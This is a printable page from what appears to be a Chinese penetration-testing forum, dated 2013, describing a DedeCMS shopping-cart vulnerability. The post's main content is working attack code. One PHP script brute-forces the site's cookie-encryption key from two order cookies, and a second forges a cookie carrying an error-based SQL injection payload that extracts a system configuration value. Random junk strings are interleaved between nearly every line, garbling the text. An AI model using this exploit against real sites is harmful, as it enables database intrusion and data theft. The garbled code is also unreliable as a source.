中国网络渗透测试联盟
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
[打印本页]
作者:
admin
时间:
2013-2-13 23:58
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
www.xxx.com/plus/search.php?keyword=
2 d1 \' [- c& U1 h8 f7 ], g, W; \
在 include/shopcar.class.php中
1 a7 V* L) A8 [% k. t' K4 U
先看一下这个shopcar类是如何生成cookie的
& h, j; M5 x7 P& a5 O$ C$ ?
239 function saveCookie($key,$value)
/ _5 y) W& e; Z, r4 ~$ r! P0 u" B! }
240 {
9 b$ K6 Y5 h3 D, I# z1 b
241 if(is_array($value))
! |3 ]/ }# k2 y8 u) T$ \% j
242 {
. q1 W1 D H4 n2 c# ^
243 $value = $this->enCrypt($this->enCode($value));
& u& ]( ~& L0 d, _/ V
244 }
% ^* o f3 y8 V2 t7 g* e
245 else
' i8 f) U+ X" e, C- c$ W# _
246 {
. _( G+ P* T7 f s! s" @ {' o
247 $value = $this->enCrypt($value);
' s( E* F) f1 v, S$ [
248 }
: y6 n7 j' M" }" Q
249 setcookie($key,$value,time()+36000,’/');
3 N& C8 g' L: P
250 }
1 a, Z6 i7 ]8 I% I
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
8 } B6 n+ @# F1 O
186 function enCrypt($txt)
* Q7 n( s9 k6 D2 e2 N
187 {
V; V b" G8 N( B Y5 x$ ^
188 srand((double)microtime() * 1000000);
* Z( \2 C Z2 R& \
189 $encrypt_key = md5(rand(0, 32000));
$ }* T4 U1 |$ K+ e5 z8 ?7 @
190 $ctr = 0;
9 G7 d! s( w z6 U( N+ A6 U
191 $tmp = ”;
/ X$ A4 k( M" I9 c d' M$ [1 W+ f
192 for($i = 0; $i < strlen($txt); $i++)
3 H* r7 w6 x( Y7 Q/ I. E
193 {
8 f; D( d0 e- V8 b) f
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
" ]* ?3 `# a# _6 U& s9 ]
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
* I! L9 | G( q! W$ Q6 S+ c
196 }
- L7 J" p) c$ ]9 c3 c, k5 u
197 return base64_encode($this->setKey($tmp));
' g' ]% W9 {$ |" c
198 }
: O" n4 L; l7 m- @7 z6 u: h2 T
213 function setKey($txt)
- O8 w' ]- @. u( J! l" T
214 {
) U3 o5 Z, X' W2 B$ c8 Q
215 global $cfg_cookie_encode;
M7 w9 B; M2 |7 V
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
! |$ e& q4 {& i0 c" }+ Z
217 $ctr = 0;
. j! }8 @) p5 O- b/ T+ @+ W* D
218 $tmp = ”;
& p. ]/ D" x$ Y' u9 k
219 for($i = 0; $i < strlen($txt); $i++)
7 ~5 g4 Y6 O- t
220 {
- Z L3 M( i. }
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
* E% |% O& E8 J N3 y% x# g- v
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
' ]/ b9 C$ u% S+ L @% x
223 }
' K+ q f+ P) N; S: K
224 return $tmp;
( @* o+ D; J1 W. H9 T% Q' o/ Q
225 }
9 Q) X* b/ o1 w) h5 q4 U' |
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
1 Q" M4 j' l& ?* K
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
" P! `) J+ V0 Q/ U- k: y1 b, g
具体代码如下:
+ ?9 n! I+ M. I- V
<?php
! p( x" ?" B. }* i. w6 i
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
9 [( [1 K! x+ l- ^
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
5 m% Z" P2 X; U2 G
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
1 i, @, B4 E2 o* R" T) L6 y# j
function reStrCode($code,$string)
7 m' g+ \2 l n3 y( M
{
$ R2 x# }( v; l$ K( I
$code = base64_decode($code);
. H. y8 X% t( Z7 T2 K
$key = “”;
2 ?5 D2 z& H, O6 [8 m8 d9 V
for($i=0 ; $i<32 ; $i++)
9 w" g, S ^ \+ S
{
1 Z V% }9 [* y) M# z) j& g
$key .= $string[$i] ^ $code[$i];
B( C1 n! p% ^2 V. _5 f. n; `
}
% E7 ~) q* ~0 P( ?/ ?
return $key;
. @3 } A9 I3 V% T
}
1 ^, c/ E, o4 R; E
function getKeys($cookie,$plantxt)
+ K3 \+ s) k+ |' C
{
8 v/ l, T- t4 T4 X- `' h
$tmp = $cookie;
: ^* j3 [3 o# P' v" y
$results = array();
! S8 o$ Z' Y! `3 Z: U% K( V+ L9 z" a
for($j=0 ; $j < 32000; $j++)
& s9 `: t1 b2 W5 Y1 x( @# a
{
' t# b- i9 I+ ^* Z# }
8 H' H5 |0 h. }4 B% X
$txt = $plantxt;
' p! \% i/ w0 V+ e
$ctr = 0;
2 w/ P- C. N, f" D+ G% i; ~
$tmp = ”;
& S! l. D( C6 I: T+ E7 H
$encrypt_key = md5($j);
9 x6 ~$ e& y/ J y; V
for($i =0; $i < strlen($txt); $i ++)
5 J* d9 ~1 W8 E( S
{
# ? V+ m# o: F2 h
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
& b6 ^2 W; f( \/ i9 D, O9 Q
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
- e* ~% \7 q+ A( H
}
, s7 P6 u$ T( {% F" D" W5 }1 |
$string = $tmp;
% T% w: I/ o/ {+ A, |) X
$code = $cookie;
. G; W9 v9 b" Z A5 `6 S/ ? F0 e
$result = reStrCode($code,$string);
! D, G8 C; U+ {$ E' u
if(eregi(‘^[a-z0-9]+$’,$result))
2 Q L$ A$ {- \% e
{
- D* m( |: y, G! N
echo $result.”\n”;
% \! t. V7 |) v4 s9 ]5 L
$results[] = $result;
) Z% X! j) W. U3 H5 |
}
5 W3 z2 W# w5 ^" y
}
( H, ^, L: ^$ w6 v8 \; O
return $results;
5 M0 b' y F0 X- m
}
/ {! `. x) e% w2 F
$results1 = getKeys($cookie1,$plantxt);
1 B8 Z- @" x! M) w
$results2 = getKeys($cookie2,$plantxt);
* T7 j8 \" o6 A; j
print “\n——————–real key————————–\n”;
; Y9 a0 @5 r: S% p f7 A3 Q
foreach($results1 as $test1)
3 o6 I) x: g3 i
{
( e" R8 N/ j' \- A3 p
foreach($results2 as $test2)
/ a9 ]0 j9 U6 b% `" J$ h
{
; V6 p/ v- V* x
if($test1 == $test2)
( D9 I( H2 ^: u2 H# g/ C8 e
{
* a" \8 Q0 W, H8 @
echo $test1.”\n”;
$ g' b% g3 t% I. K6 B0 X
}
7 O4 T/ J1 E7 S( `7 M
}
1 L# H/ a3 H; r! Y
}
+ L# a \& P2 {9 W5 C
?>
* ^. N; d, n. W% |. C' {0 w
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
$ w- Q* q: J' F
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
, I( k+ D/ P' `) j
然后推算出md5(strtolower($cfg_cookie_encode))
4 N- U j3 V: ?* o+ q
得到这个key之后,我们就可以构造任意购物车的cookie
, W9 a# o" t5 K
接着看
% e9 @1 _) W" F0 _. c, d7 x
20 class MemberShops
u( d3 a6 C7 l6 t% V0 B. U
21 {
+ {" v* P* y# e9 t/ P0 m
22 var $OrdersId;
8 e7 V) b4 C9 K3 X. b" X+ _" @1 R
23 var $productsId;
7 \8 H$ h- M+ u; o. N# Z. i. Q
24
. A8 f6 _8 A% m$ L4 |+ v- l
25 function __construct()
2 L5 c1 f" P1 w' ?$ M8 H3 ^
26 {
! v5 d5 b/ t+ [( {' \( \& T9 g
27 $this->OrdersId = $this->getCookie(“OrdersId”);
- Z' R6 N8 u% a# U* i
28 if(empty($this->OrdersId))
0 y8 b& F& S( ^5 G* U( F- g! l2 W
29 {
! C, x9 H+ u0 C( c+ F$ \2 j
30 $this->OrdersId = $this->MakeOrders();
7 m& d& c2 r. P+ H( Y( g2 {# E4 E
31 }
: L2 p( o" g' a* h2 J
32 }
8 j1 ~! L; ^$ P0 C" i3 S, l6 i, H
发现OrderId是从cookie里面获取的
8 i$ b7 T3 N& O# j
然后
, T" V# i& q% y
/plus/carbuyaction.php中的
( H) Y2 U( g* n+ G9 v
29 $cart = new MemberShops();
7 F1 N5 N, n. Y/ O
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
6 J2 ?* \+ V( ? a4 l# e- D
……
0 O S- J. w* v/ f! P7 o6 \, f
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
/ _/ L$ Y1 U& v5 H7 v$ z
接着我们就可以注入了
; F( u, L0 C* p2 J9 c3 H! C4 M
通过利用下面代码生成cookie:
1 X% t) Q' d. P. w- o; g y
<?php
, D! |! W0 y! C: h I c; G
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
! j, ^9 K% W$ o ^* l9 B6 D2 f
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
1 M! ?: h; c0 i" g1 R9 ]
function setKey($txt)
5 G; \! C6 N' c
{
2 V7 P( `- f4 I, O" ~7 ~) w2 B
global $encrypt_key;
, q$ O1 s! E5 h6 h! e) m5 O
$ctr = 0;
( {9 I* P0 u5 c" v3 H( _
$tmp = ”;
& r( P: u+ L: T. `! \
for($i = 0; $i < strlen($txt); $i++)
$ Z% Q" @, L- i A$ e7 O
{
: w9 s2 E# G5 w8 f; P7 A
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
% O V; ~: v3 F
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
- P& b0 x& g6 b B+ J( b
}
9 K! b. e& H5 \
return $tmp;
* d& i' ^3 u) ?, x) w- y
}
3 @6 S! r/ Z& P2 ?/ w. f9 I4 l
function enCrypt($txt)
. n l6 ]2 f+ f. ^9 \
{
- g7 p8 l( O4 {) y
srand((double)microtime() * 1000000);
8 d0 _8 b. J, f5 T/ C- J$ r4 t
$encrypt_key = md5(rand(0, 32000));
8 I0 E8 I1 [9 \
$ctr = 0;
( r6 `* W9 p. m
$tmp = ”;
! p' r1 _* e& a0 v, D2 o
for($i = 0; $i < strlen($txt); $i++)
6 W( Q7 U1 ?- D+ }3 w. i# j
{
g$ \. l: B$ h
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$ C% R* Q9 Q. ~: w! M
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
+ G1 A/ y3 w" }: a9 w
}
% l5 @+ Q( v5 l! Y6 e8 S5 h; Q9 q4 L
return base64_encode(setKey($tmp));
* a% N0 J [ o, V! z& k
}
) p! ]- I. ?: y( R' E6 Q
for($dest =0;$dest = enCrypt($txt);)
1 S- I, k1 J8 ~$ n7 |0 p5 _4 C
{
. {# \" r" u: L- W0 U
if(!strpos($dest,’+'))
! S0 K0 X3 U) ?3 Z
{
5 v7 k0 r5 B4 E
break;
% M* H( E0 n: o6 f* I! |9 v* U
}
3 R% B- l: Z& k/ V6 r" V( {0 c
}
; k; R) k' C5 T1 C$ T2 R; N
echo $dest.”\n”;
/ I* j& Z' j5 b5 U- p& V1 U
?>
[) I& U4 T8 Z9 e2 l. }8 C
/ Y% P6 X9 E% y/ u" f
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2